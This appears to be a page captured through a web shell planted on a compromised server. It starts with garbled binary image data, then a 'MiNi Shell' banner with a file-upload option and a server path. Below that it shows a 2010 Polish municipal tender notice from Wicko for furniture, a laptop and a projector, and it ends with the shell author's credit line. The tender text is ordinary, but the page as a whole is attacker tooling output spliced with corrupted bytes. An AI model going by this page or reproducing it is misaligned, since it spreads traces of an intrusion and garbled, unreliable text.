JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20100806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20100806/242028-N-2010.html

<p class="kh_header"><b>Wicko: Dostawa i montaż wyposażenia oraz sprzętu w  budynku byłego GOK w Wicku, 
realizowana w ramach projektu pn. Utworzenie centrum kultury, rekreacji i promocji, poprzez remont i wyposażenie obiektu użyteczności publicznej w miejscowości Wicko.</b><br>
<b>Numer ogłoszenia: 242028 - 2010; data zamieszczenia: 06.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wicko , Wicko 60, 84-352 Wicko, woj. pomorskie, tel. 059 8611182, faks 059 8611101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wicko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż wyposażenia oraz sprzętu w  budynku byłego GOK w Wicku, 
realizowana w ramach projektu pn. Utworzenie centrum kultury, rekreacji i promocji, poprzez remont i wyposażenie obiektu użyteczności publicznej w miejscowości Wicko..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż wyposażenia oraz sprzętu do budynku byłego GOK   w Wicku w Gminie Wicko. 
Jako dostawę należy rozumieć zakup poszczególnych produktów, transport, wniesienie ich do poszczególnych lokali w budynku, montaż , usunięcie i wywóz opakowań, uprzątnięcie pomieszczeń i inne wyżej nie wymienione, a konieczne do przekazania zamówionej rzeczy Zamawiającemu jako funkcjonalnej               i sprawnej.
1. Wymagania ogólne.
1.1. Meble kuchenne - opisane poniżej szafki stanowią komplet do zaplecza kuchennego
- Szafki kuchenne wiszące - 2 szt.
Szafki kuchenne, wiszące, dwudrzwiowe, z dwiema półkami w środku. Wymiary: dł. 0,8 m. x wys.0,6 m; głębokość 0,6 m. Drzwiczki z płyty MDF w kolorze olcha, buk, orzech, czereśnia, klon lub jabłoń. Wszystkie krawędzie płyty zabezpieczone okleiną PCV w kolorze płyty.
- Szafki kuchenne stojące - 3 szt, w tym:
1 szt - szafka kuchenna, stojąca: dwudrzwiowa, z jedną półką w środku. Wymiary: dł. 0,8 m x wys. 0,8 m; gł. 0,6 m. Drzwiczki z płyty MDF w kolorze olcha, buk, orzech,czereśnia, klon lub jabłoń. Wszystkie krawędzie płyty zabezpieczone okleiną PCV w kolorze płyty. Szafki przykryte blatem . Blaty laminowane odporne na uszkodzenia, wysoką temperaturę i wilgoć gr. min. 25mm., w kolorach jasnych lub harmonizujących z kolorami drzwiczek.
1 szt - szafka kuchenna, stojąca z 5 jednakowymi szufladami. Wymiary szafki : dł. 0,4 m x wys. 0,8 m x gł. 0,6 m. Drzwiczki z płyty MDF w kolorze olcha, buk, orzech, czereśnia, klon lub jabłoń. Wszystkie krawędzie płyty zabezpieczone okleiną PCV w kolorze płyty. Szafka przykryta blatem. Blaty laminowane odporne na uszkodzenia, wysoką temperaturę i wilgoć gr. min. 25mm., w kolorach jasnych lub harmonizujących z kolorami drzwiczek.
1 szt - szafka kuchenna, stojąca z 1 drzwiowa z jedną półką. Wymiary szafki : dł. 0,4 m x wys. 0,8 m x gł. 0,6 m. Drzwiczki z płyty MDF w kolorze olcha, buk, orzech, czereśnia, klon lub jabłoń. Wszystkie krawędzie płyty zabezpieczone okleiną PCV w kolorze płyty. Szafka przykryta blatem. Blaty laminowane odporne na uszkodzenia, wysoką temperaturę i wilgoć gr. min. 25mm., w kolorach jasnych lub harmonizujących z kolorami drzwiczek.
Wszystkie szafki stojące posadowione na cokoliku o wysokości 0,1m..
1.2. Stoły składane - ilość - 25 szt.
Wymiary blatu: prostokąt o wymiarach nie mniej niż 180 cm X 80 cm i wysokości min. 70cm. Blat  z płyty wiórowej laminowanej drewnopodobnej lub jednobarwnej. Grubość blatu min. 25 mm.                                            
- Kolor - olcha, buk, jabłoń, orzech lub podobne - Zamawiający dokona ostatecznego wyboru koloru             
 - Ramy stołów czarne.                                                                                                                                              - Stoły z możliwością składania nóg.                                                                                                                      - Gwarancja min. 12 miesięcy 
1.3. Krzesła - ilość - 200 szt. 
- Kolor siedziska i oparcia - czarny.                                                                                                                         - Krzesło konferencyjne z profilowanym siedziskiem obitym materiałem 100% Polipropylen, który przeszedł pomyślnie testy trudnopalności oraz badania wytrzymałościowe.                                                             
- Oparcie profilowane metalowe                                                                                                                                 - Podstawa krzesła - czteronożny stelaż metalowy w kolorze czarnym, do którego przymocowane jest sztywno siedzisko i oparcie.                                                                                                                                        - Elementy stelażu, które opierają się na podłodze muszą być wykończone nakładkami z tworzywa sztucznego.                                                                                                                                                                   - Siedzisko z zaokrągloną krawędzią  przednią w celu zmniejszenia ucisku na mięśnie ud i zapobiegania uczuciu drętwienia kończyn dolnych podczas siedzenia.                                                                                           - Szerokość siedziska i oparcia pozwalająca na utrzymanie prawidłowej pozycji ciała nie ograniczając jednocześnie możliwości zmiany pozycji ciała podczas siedzenia.                                                                                - Możliwość sztaplowania krzeseł w ilości nie mniej niż 10 szt. w słupku.                                                             - Gwarancja min 12  miesięcy
1.4. kuchenka elektryczna. 
- wymiary 85/50/60 cm                                                                                                                                              - elektryczna płyta grzewcza.                                                                                                                                                   - 4 ceramiczne pola grzewcze                                                                                                                                              - kolor płyty- czarny                                                                                                                                                        - sterowanie mechaniczne - pokrętła na froncie piekarnika                                                                                                      - pojemność użytkowa piekarnika minimum 40 l                                                                                                                 - Klasa energetyczna A                                                                                                                                              - Emalia łatwoczyszcząca 
1.5. szafy biurowe dwudrzwiowe
Szafa dwudrzwiowa biurowa -2 szt. . Wykonana z płyty wiórowej laminowanej w kolorze olcha, buk, orzech, czereśnia, klon lub jabłoń,  wykończonej profilem PCV w tym samym kolorze. Wnętrze szafy dzielone po połowie w pionie ścianką na całej głębokości.                                                                                                             W obydwu częściach szafy zamontowane półki z możliwością regulacji. Ścianka tylna wykonana z płyty pilśniowej. Drzwi szafy zamykane na zamki meblowe. Drzwi szafy osadzone na zawiasach puszkowych. Uchwyty do drzwi wykonane z metalu, chromowane, zamontowane pionowo pośrodku drzwi. Ilość półek zamontowanych -min. 8 szt. Wymiary: szerokość min. 80 cm, głębokość 45 cm, wysokość min.180 cm. 
1.6. Regał na czasopisma, formularze czy ulotki reklamowe.
Wykonany z płyty wiórowej laminowanej o grubości min. 18 mm w kolorze olcha, buk, orzech, czereśnia, klon lub jabłoń,  wykończonej profilem PCV w tym samym kolorze. Ukośnie ustawione półki ekspozycyjne z podwyższonymi krawędziami. Wymiary: szerokość min. 80 cm, głębokość min.35 cm, wysokość min.180 cm. 
1.7. Biurko dla operatora sprzętu.
Klasyczne biurko z prostokątnym blatem o wymiarze 160 x 68 cm, bocznymi ściankami, które mają funkcję nóżek oraz tylną osłoną. Blat, nóżki oraz tylna osłona wykonane  z płyty melaminowej o grubości min. 20 mm, dostępnej w kolorach -  olcha, buk, orzech, czereśnia, klon lub jabłoń. Krawędzie blatów zabezpieczone  trwałym obrzeżem ABS o grubości 2 mm, wykonanym w kolorze płyty. W nóżkach (boczne ściany) stopki ograniczające rysowanie podłóg. Blat posiadający 2 przelotki na kable, które  umieszczone z dwóch stron blatu umożliwiają ustawienie sprzętu w dowolnym miejscu i poprowadzenie kabli tak, aby nie zajmowały miejsca na biurku
Biurko objęte min. 12-miesięczną gwarancją  
1.8. Krzesło biurowe, obrotowe z wysokim oparciem.
Krzesło obrotowe na kółkach. Kolor czarny. Regulowana wysokość siedziska i oparcia z pomocą dźwigni. Krzesło obite materiałem, który przeszedł pomyślnie testy trudnopalności oraz badania wytrzymałościowe. Szerokość siedziska min 45 cm, wysokość oparcia min. 50 cm, regulacja wysokości od min. 45 cm do 55cm.
1.9. Zlewozmywak stalowy jednokomorowy z ociekaczem
- stal szlachetna mat                                                                                                                                                     - wymiary długość max. 60 cm, szerokość max 47 cm., głębokość min. 16 cm.
1.10.  Półka zawieszana.
Wykonana  z płyty wiórowej laminowanej o grubości min. 20 mm, dostępnej w kolorach olcha, buk, orzech, czereśnia, klon lub jabłoń. 
Wymiary: szerokość 1m., głębokość 30 cm
1.11.  Lada recepcyjna - promocyjna.
Lada składająca się z 6 elementów łączonych w jedną całość. Front lady: z giętej płyty laminowej, elementy gięte posiadają kąt 90 stopni. Blat oraz boki : płyty melaminowane grubości 25 mm z obrzeżem PCV 2mm. Każdy moduł posiadający  stopki regulacyjne pozwalające na precyzyjne wypoziomowanie zestawu. Kolor olcha, buk, orzech, czereśnia, klon lub jabłoń.
Łączna wielkość lady wynosi: długość 200cmX 220cm wysokość 108cm.                                                        Wymiary poszczególnych elementów:                                                                                                                         - 1 element: długość 140 cm wysokość 73 cm szerokość blatu 68 cm                                                                           - 2 element: długość 140cm wysokość 35 cm szerokość blatu 29 cm                                                                          - 3 element półokrągły gięty posiadający kąt 90stopni: wysokości 73 cm                                                                                                - 4 element półokrągły gięty posiadający kąt 90stopni: wysokości 35cm, szerokości blatu 29 cm                                               
- 5 element prostokątny: długość 120 cm, wysokość 73 cm, szerokość blatu 68 cm                                                    - 6 element prostokątny: długość 120 cm, wysokość 35 cm, szerokość blatu 29 cm
 1.12. Komputer przenośny - laptop o następujących parametrach:
Masa bez baterii nie więcej niż 3 kg,
procesor dwurdzeniowy zgodny ze standardami  x86-32 i x86-64  o wydajności w PassMark Performance Test - CPU Mark min. 1420 pkt.,
pamięć operacyjna minimum 2 GB,
dysk twardy minimum 320 GB,
wbudowany napęd dysków DVD+/-RW DL,
karta sieci bezprzewodowej zgodna z IEEE 802.11b/g,
karta sieci przewodowej minimum Fast Ethernet  (100Mb),
złącza:
3x USB, 
ExpressCard,
wyjście na monitor zewnętrzny pozwalające na przesył obrazu w rozdzielczości minimalnej 1920 punktów w poziomie  i 1080 punktów  w pionie (Full HD),
1 x wejście mikrofonu zewnętrznego, 
1 x wyjście słuchawkowe (stereofoniczne), 
Matryca LCD:
przekątna minimum 13,3 cala, 
rozdzielczość w pionie minimum 768 punktów,
rozdzielczość w poziomie minimum 1280 punktów,  
załączone oprogramowanie:
system operacyjny w wersji polskojęzycznej 
z obsługą technologii .NET Framework 3.5 lub równoważnej pozwalającej uruchamiać oprogramowanie wykonane w technologii .NET Framework 3.5,
pozwalający na uruchomienie i wykorzystywanie wszystkich funkcji, oprogramowania: program Płatnik ZUS, SJO Besti@, 
z zapewnionymi aktualizacjami bezpieczeństwa do końca 2015 roku włącznie,
Pakiet biurowy w wersji polskojęzycznej zawierający arkusz kalkulacyjny, edytor tekstu i program do tworzenia prezentacji,
obsługujący w pełni formaty plików: doc, docx, xls, xlsx, ppt, pptx (włącznie z zawartymi w nich makrami), 
z zapewnionymi aktualizacjami bezpieczeństwa do końca 2015 roku włącznie,
wersja komercyjna, 
nieograniczona czasowo,
oprogramowanie odtwarzające zawartość płyt DVD, spełniającą standardy DVD-Video
Gwarancja minimum 24 miesiące.
1.13 projektor multimedialny o parametrach:
Rozdzielczość nominalna optyczna minimum Full HD - 1920 w poziomie i 1080 w pionie,
jasność minimum 1800 ANSI lumenów,
kontrast minimum 3000:1,
maksymalna odległość od ekranu powyżej 16 metrów,
maksymalna przekątna rzucanego obrazu nie mniej niż 7 metrów,
maksymalna głośność 30 dB w nominalnym trybie pracy (nie w trybie ekologicznym),
żywotność lampy minimum 3000 godzin,
obsługiwana paleta minimum 16,7 miliona kolorów,
wymagane wejścia:
Analogowe RGB D-sub 15 pin,
HDMI wersja1.3 lub wyższa,
Component Video: RCA x 3,
S-Video: Mini Din 4 pin,
Composite Video: RCA x 2 ,
Audio L/R: RCA x 2,
Audio Stereo Mini Jack ,
zgodność ze standardem HDTV,
waga nie przekraczająca 10 kg 
możliwość wyświetlania obrazu w proporcjach 4:3,
na wyposażeniu pilot do zdalnego sterowania,
gwarancja minimum 24 miesięcy.
1.14 Uchwyt sufitowy do montażu projektorów o parametrach:
udźwig minimum 15 kilogramów
regulacja kąta nachylenia
wysuwane ramię z regulacją wysokości/długości w przedziale od 400 do 700 mm lub o większej rozpiętości
prowadzenie kabli w rurze uchwytu
możliwość instalacji na suficie lub na ścianie
konstrukcja nie utrudniająca obiegu powietrza wokół projektora 
możliwość obrotu projektora wokół osi o 360 stopni
możliwość zamontowania urządzenia o wymiarach minimum 450 na 400 mm

2. W przypadku, gdy w opisie zamówienia, w jakiejkolwiek części dokumentacji lub innej części SIWZ, zostały wskazane znaki towarowe, patenty lub pochodzenie materiałów, urządzeń, bądź przedmiot zamówienia został opisany za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia, Zamawiający dopuszcza oferowanie materiałów i urządzeń równoważnych opisywanym,    z zastrzeżeniem, że gwarantują one realizację zamówienia  zgodnie z opisem przedmiotu zamówienia               i zapewniają uzyskanie parametrów technicznych i funkcjonalno-użytkowych nie gorszych od założonych a także zgodne z wymogami określonymi w Polskich Normach przenoszących normy europejskie lub normach innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy.
3. Oferowane wyposażenie oraz sprzęt   muszą  być fabrycznie nowe. Wszystkie elementy przedmiotu zamówienia powinny być wolne od wad fizycznych  oraz spełniać wymagania jakościowe.
4. Gwarancje, instrukcje oraz wszystkie inne dokumenty dotyczące przedmiotu zamówienia winny być sporządzone  w języku polskim.  
5. Zamawiający wymaga, aby dostarczone wyposażenie ( stoły, krzesła i meble ) objęte były minimum 12-miesięczną gwarancją,  natomiast sprzęt ( projektor multimedialny, komputer przenośny, kuchenka elektryczna)  co najmniej 24 - miesięczną gwarancją . Wykonawca będzie  zobowiązany określić w dokumencie gwarancyjnym : długość okresu gwarancji w miesiącach, pełny opis warunków gwarancji, czas naprawy ( w dniach ), lokalizację serwisu gwarancyjnego ( kraj, miasto, adres,  tel/fax ).
6. Zamawiający wymaga, aby wyposażenie oraz sprzęt objęty przedmiotem zamówienia zostały dostarczone i zamontowane przez Wykonawcę w  budynku byłego GOK w Wicku, na jego koszt, w terminie określonym  w umowie.  Podstawą przekazania będzie podpisanie przez strony protokołu zdawczo-odbiorczego (wzór protokołu stanowi załącznik do umowy ) 
7. Główne miejsce realizacji przedmiotu zamówienia :  województwo pomorskie, gmina Wicko, miejscowość Wicko - budynek byłego GOK zlokalizowany na dz. 546..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.00.00.00-2, 30.21.31.00-6, 38.65.21.00-1, 39.11.00.00-6, 39.12.12.00-8, 39.14.10.00-2, 39.72.11.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustala w tym zakresie żadnych wymagań szczegółowych, warunek ten zostanie natomiast uznany za spełniony, gdy Wykonawca  złoży oświadczenie, że posiada  odpowiednią wiedzę oraz doświadczenie niezbędne do prawidłowego  wykonania zamówienia( zgodnie z załącznikiem  Nr 2    do SIWZ ) . 
   Oceny spełnienia w/w warunku Zamawiający dokona sprawdzając kompletność oferty oraz poprawność i treść złożonych dokumentów wymienionych w  SIWZ metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie ustala w tym zakresie żadnych wymagań szczegółowych, warunek ten zostanie natomiast uznany za spełniony, gdy Wykonawca zgodnie ze  swoją wiedzą złoży oświadczenie, że dysponuje odpowiednim potencjałem technicznym do wykonania zamówienia  ( zgodnie z załącznikiem  Nr 2    do SIWZ )  
Oceny spełnienia w/w warunku Zamawiający dokona sprawdzając kompletność oferty oraz poprawność i treść złożonych dokumentów wymienionych w  SIWZ metodą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień umowy zawartej z wybranym Wykonawcą    w zakresie zmiany terminu realizacji zamówienia następujących przypadkach :
- przedłużających się procedur związanych z wykorzystaniem przez Wykonawców środków   ochrony prawnej w zamówieniach publicznych,
- opóźnienia w wykonaniu prac remontowo-budowlanych w sali widowiskowej GOK - jeśli te mają bezpośredni wpływ na wykonanie zamówienia przez dostawcę  wyposażenia oraz sprzętu 
2.W żadnym wypadku postanowień p-tu  1 nie należy interpretować jako udzielenie dowolnej ze stron roszczenia do żądania zmiany umowy, a jedynie możliwość dokonania zmiany umowy. 
3.Każda zmiana umowy musi być dokonana na piśmie w formie aneksu pod rygorem nieważności oraz wymaga zgody drugiej strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wicko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Wicku, Wicko 60, 84-352 Wicko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.08.2010 godzina 10:00, miejsce: Sekretariat Urzędu Gminy w Wicku - pokój Nr 8 na parterze, Wicko 60, 84-352 Wicko..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pt. Utworzenie centrum kultury, rekreacji i promocji, poprzez remont i wyposażenie obiektu użyteczności publicznej w miejscowości Wicko
współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com